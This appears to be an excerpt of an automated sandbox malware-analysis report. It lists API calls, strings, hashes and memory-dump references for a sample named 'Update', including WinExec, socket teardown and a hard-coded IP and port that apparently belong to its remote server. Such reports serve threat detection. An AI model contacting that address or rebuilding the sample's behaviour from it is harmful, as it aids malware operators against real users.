                                                                                                • Instruction ID: e2e0b3d062d787f99d787063b624e9a47e01a5ceed69b34c49d3f3bc16e6f751
                                                                                                • Opcode Fuzzy Hash: d853c5aad6a4ca1283704040be1a2fdba58bd4e9b88c6b00cf5b9d9771d5e89a
                                                                                                • Instruction Fuzzy Hash: C911E136604746AFF711DFA8DC41D8B37E8FF453E0B110029F95C8A19ADB79E8008AA0
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,037F7523), ref: 037F743D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 037F7444
                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,037F7523), ref: 037F7452
                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,037F7523), ref: 037F745A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                • API String ID: 3433367815-192647395
                                                                                                • Opcode ID: 0a297bcb851f560c3b2a2976e66a31a2bed1b48f06aeb2ed12d4aad4a5b737f2
                                                                                                • Instruction ID: 2e199db900954a05f6b7bfa3b23821b0871894e45b5a2b9a9d15527d9354ff24
                                                                                                • Opcode Fuzzy Hash: 0a297bcb851f560c3b2a2976e66a31a2bed1b48f06aeb2ed12d4aad4a5b737f2
                                                                                                • Instruction Fuzzy Hash: D10128B0D002099FCB94EFF499446BEBBF9EB48200F5446A9DA59E3340E6399A50CF61
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 037FF9CA
                                                                                                  • Part of subcall function 03803CA0: TlsGetValue.KERNEL32(00000000,03803DF9,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF), ref: 03803CA9
                                                                                                  • Part of subcall function 03803CA0: DecodePointer.KERNEL32(?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CBB
                                                                                                  • Part of subcall function 03803CA0: TlsSetValue.KERNEL32(00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CCA
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 037FF9D5
                                                                                                  • Part of subcall function 03803C80: TlsGetValue.KERNEL32(?,?,037FF9DA,00000000), ref: 03803C8E
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 037FF9E8
                                                                                                  • Part of subcall function 03803CD4: DecodePointer.KERNEL32(?,?,?,037FF9ED,00000000,?,00000000), ref: 03803CE5
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 037FF9F1
                                                                                                • ExitThread.KERNEL32 ref: 037FF9F8
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037FF9FE
                                                                                                • __freefls@4.LIBCMT ref: 037FFA1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 2383549826-0
                                                                                                • Opcode ID: 0aa544b76ae90a7a2702ab0b57d1e124f9b1abffc579b65f477af77e41c40ee8
                                                                                                • Instruction ID: 31449434a7b58e5a8613ee74ca53c1d05cc46e3a3f1cd24a48c4192cb93fb064
                                                                                                • Opcode Fuzzy Hash: 0aa544b76ae90a7a2702ab0b57d1e124f9b1abffc579b65f477af77e41c40ee8
                                                                                                • Instruction Fuzzy Hash: F0F0F97C601744AFC748FBB5C94880EBBADAE8924472585D8EA09DB251DA74D442CBA2
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                                                                  • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                                                                  • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                                                                  • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                                                                  • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                                                                  • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                                                                                • ExitThread.KERNEL32 ref: 100071EA
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                                                                                • __freefls@4.LIBCMT ref: 10007210
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 2383549826-0
                                                                                                • Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                                • Instruction ID: 9ef8d05c11a244158b1ee883055881acaa61a2209176cdde4bb0df2a080a06ba
                                                                                                • Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                                • Instruction Fuzzy Hash: 7EF09679404240ABF304DFB5C94988E7BA9FF482C4725C458F90C8B21BDB39E8428790
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $,$jIk
                                                                                                • API String ID: 0-2946808363
                                                                                                • Opcode ID: 8f3334da1f3a356116e2222cbd4ea2a31c1f7b91e5345f2a00895f41efc606df
                                                                                                • Instruction ID: 6e636de0423e46cf617a83e7679ecd355efb2a2fbfedec34891fc5d31dc7925a
                                                                                                • Opcode Fuzzy Hash: 8f3334da1f3a356116e2222cbd4ea2a31c1f7b91e5345f2a00895f41efc606df
                                                                                                • Instruction Fuzzy Hash: A472BC71D112688BEB24CF28C8957EDBBB2AF85304F158298D48D7B691DB715EC8CF81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $,$jIk
                                                                                                • API String ID: 0-2946808363
                                                                                                • Opcode ID: 93b272d3837ad76a5d1f0d99c4160e4aafadbab785314ff676ae0a3ebd6b9443
                                                                                                • Instruction ID: d5919ffeb0ec1e928b0e5c4219055a27f37ce7f7f02ab106824d0b46a0c09d97
                                                                                                • Opcode Fuzzy Hash: 93b272d3837ad76a5d1f0d99c4160e4aafadbab785314ff676ae0a3ebd6b9443
                                                                                                • Instruction Fuzzy Hash: 3272BB71D112688BDB24CF28C8957EDBBB2AF85304F158298D48DBB691DB715EC8CF81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b507303b741939f7a97eaf339ea0c5a17755335ce7523e0364ef3a8f1491c2ae
                                                                                                • Instruction ID: 75b9e4f8fcc04c526c3f55587da26c03b3ea34d766d7f3a35620b65360d1c6b9
                                                                                                • Opcode Fuzzy Hash: b507303b741939f7a97eaf339ea0c5a17755335ce7523e0364ef3a8f1491c2ae
                                                                                                • Instruction Fuzzy Hash: AAB10AB0A14349AFDB05CF99C948BDDBBB9BF06308F18435AE414A7B81C77499C6CB60
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
                                                                                                • Sleep.KERNEL32(00000258), ref: 100032FE
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
                                                                                                • Sleep.KERNEL32(0000012C), ref: 1000332B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 3137405945-0
                                                                                                • Opcode ID: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                                                • Instruction ID: f89297930b1253133b9af3f62c08b225611c8876bcc0692efb07df5bac526d50
                                                                                                • Opcode Fuzzy Hash: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                                                • Instruction Fuzzy Hash: 65F08971104314AFD610DBE9CCC4D46F3B8AF89331B144709F221872D0CAB1E8018BA0
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 037F669B
                                                                                                • CoCreateInstance.OLE32(038146FC,00000000,00000001,0381471C,?,?,?,?,?,?,?,?,?,?,037F588A), ref: 037F66B2
                                                                                                • SysFreeString.OLEAUT32(?), ref: 037F674C
                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,037F588A), ref: 037F677D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                • String ID: FriendlyName
                                                                                                • API String ID: 841178590-3623505368
                                                                                                • Opcode ID: ebe239086112dc001acae03d0e763ee8f2a14027d5ef1c9adb4b03345d39a112
                                                                                                • Instruction ID: b62ea53d6a380ddfabe3a98aa49bf74580af1d31d38dd36d426bb846d669bbfb
                                                                                                • Opcode Fuzzy Hash: ebe239086112dc001acae03d0e763ee8f2a14027d5ef1c9adb4b03345d39a112
                                                                                                • Instruction Fuzzy Hash: 4A311975600609AFDB00DA99DC80EAEB7BDEFC9704F148598E615EB354DB71EA01CB60
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 037FF721
                                                                                                  • Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
                                                                                                  • Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
                                                                                                  • Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8
                                                                                                • std::exception::exception.LIBCMT ref: 037FF756
                                                                                                • std::exception::exception.LIBCMT ref: 037FF770
                                                                                                • __CxxThrowException@8.LIBCMT ref: 037FF781
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                • String ID: bad allocation
                                                                                                • API String ID: 615853336-2104205924
                                                                                                • Opcode ID: a04d9f1bbd9b93620257704cda16e87564f0ea9cdf73fafdbd18491a14bd9236
                                                                                                • Instruction ID: 82a0c54e9d967fbbabf7c443ebfefc508a4daee99d8d1503f5f3689a1cb0d0f8
                                                                                                • Opcode Fuzzy Hash: a04d9f1bbd9b93620257704cda16e87564f0ea9cdf73fafdbd18491a14bd9236
                                                                                                • Instruction Fuzzy Hash: B1F0F9799007096ECB00EBA4EC29A9EB76DBB40624F54009DD714DA2D5DF7085048B60
                                                                                                APIs
                                                                                                • GetCommandLineW.KERNEL32(00000001), ref: 006E1C61
                                                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 006E1C68
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,006E0000), ref: 006E1CD3
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 006E1CF3
                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,006E0000,00000000,00000000,00000000,006E2778,00000014), ref: 006E1D25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharCommandLineMultiWide$ArgvFreeLocal
                                                                                                • String ID:
                                                                                                • API String ID: 4060259846-0
                                                                                                • Opcode ID: fcc31949c0eb5ef61d54217deff79c3cf15f3bb56fedc6e190c507e4bcede5fd
                                                                                                • Instruction ID: 1b4502a34c7f13a6763e7a3898025c74d1c51c4c3b0fcdcb27db144550cf3201
                                                                                                • Opcode Fuzzy Hash: fcc31949c0eb5ef61d54217deff79c3cf15f3bb56fedc6e190c507e4bcede5fd
                                                                                                • Instruction Fuzzy Hash: A931F070605385ABE710EF299C81B5B77EAEF85710F10092CF959DB2C0E670AD088B62
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0
                                                                                                • Opcode ID: c6dec0db1508cfb61d76926ffbb95c5239ea01895004ddf7ce5118b5204e5148
                                                                                                • Instruction ID: e06421b222fa10b690bc35732376973a3f4f385824cd5e7b8b812f31bf2c7386
                                                                                                • Opcode Fuzzy Hash: c6dec0db1508cfb61d76926ffbb95c5239ea01895004ddf7ce5118b5204e5148
                                                                                                • Instruction Fuzzy Hash: 9521F372D21618AFCF118F56CE42AAF3AF8DB80698F144119F8155BA10C3308DC6CBE0
                                                                                                APIs
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
                                                                                                • CancelIo.KERNEL32(?), ref: 10002D46
                                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
                                                                                                • closesocket.WS2_32(?), ref: 10002D59
                                                                                                • SetEvent.KERNEL32(00000001), ref: 10002D63
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                • String ID:
                                                                                                • API String ID: 1486965892-0
                                                                                                • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                                • Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
                                                                                                • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                                • Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0
                                                                                                APIs
                                                                                                • WinExec.KERNEL32(00000000,00000000), ref: 6CA9416E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exec
                                                                                                • String ID: &$'$j)wh
                                                                                                • API String ID: 459137531-3604346523
                                                                                                • Opcode ID: eb1b3bed5f09a56c803aff89e5945ecb2700ec176e371690c35d7a67f8250f6a
                                                                                                • Instruction ID: f9612d6249db2381a2c40606b8b534d47b7aca21bf12f9d545992a68089b9755
                                                                                                • Opcode Fuzzy Hash: eb1b3bed5f09a56c803aff89e5945ecb2700ec176e371690c35d7a67f8250f6a
                                                                                                • Instruction Fuzzy Hash: EF711571C152588FDB14CFA8C9483EEBBF2BF85308F15465CD0246BB91DB755AC88B91
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 10006F31
                                                                                                  • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                                                  • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                                                  • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                                                • std::exception::exception.LIBCMT ref: 10006F66
                                                                                                • std::exception::exception.LIBCMT ref: 10006F80
                                                                                                • __CxxThrowException@8.LIBCMT ref: 10006F91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 615853336-0
                                                                                                • Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                                                • Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
                                                                                                • Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                                                • Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: 137.220.229.61$18852
                                                                                                • API String ID: 4218353326-1703524508
                                                                                                • Opcode ID: c2bf5971951960306a452e17c11246b69d0891221bda3418fa054ef513208df7
                                                                                                • Instruction ID: 0e717f33d62774a9803fe9875cb5b393520442247822ef2306dd34a57b0c0a09
                                                                                                • Opcode Fuzzy Hash: c2bf5971951960306a452e17c11246b69d0891221bda3418fa054ef513208df7
                                                                                                • Instruction Fuzzy Hash: 8E4137B19103155FD728AF28E940B96BBE6EF8630CF15092DE0158BB41E735DACE87D1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen$Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 2737124692-0
                                                                                                • Opcode ID: 8edb03a662ad1b9acc342c924ce49a563f6e6c32bf14beca27e3f02b2b74ac59
                                                                                                • Instruction ID: 9cac29b745284b220113db1863642330b20b428bf169c6f9ecc12d94be198e01
                                                                                                • Opcode Fuzzy Hash: 8edb03a662ad1b9acc342c924ce49a563f6e6c32bf14beca27e3f02b2b74ac59
                                                                                                • Instruction Fuzzy Hash: A5614AB2D212289BDB10CFA8DD417DDBBF2FF45314F15032AE815A7780E7319A8887A1
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA91070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6CA91124
                                                                                                  • Part of subcall function 6CA91070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA9115F
                                                                                                • Sleep.KERNEL32(000000C8), ref: 6CA93DFC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
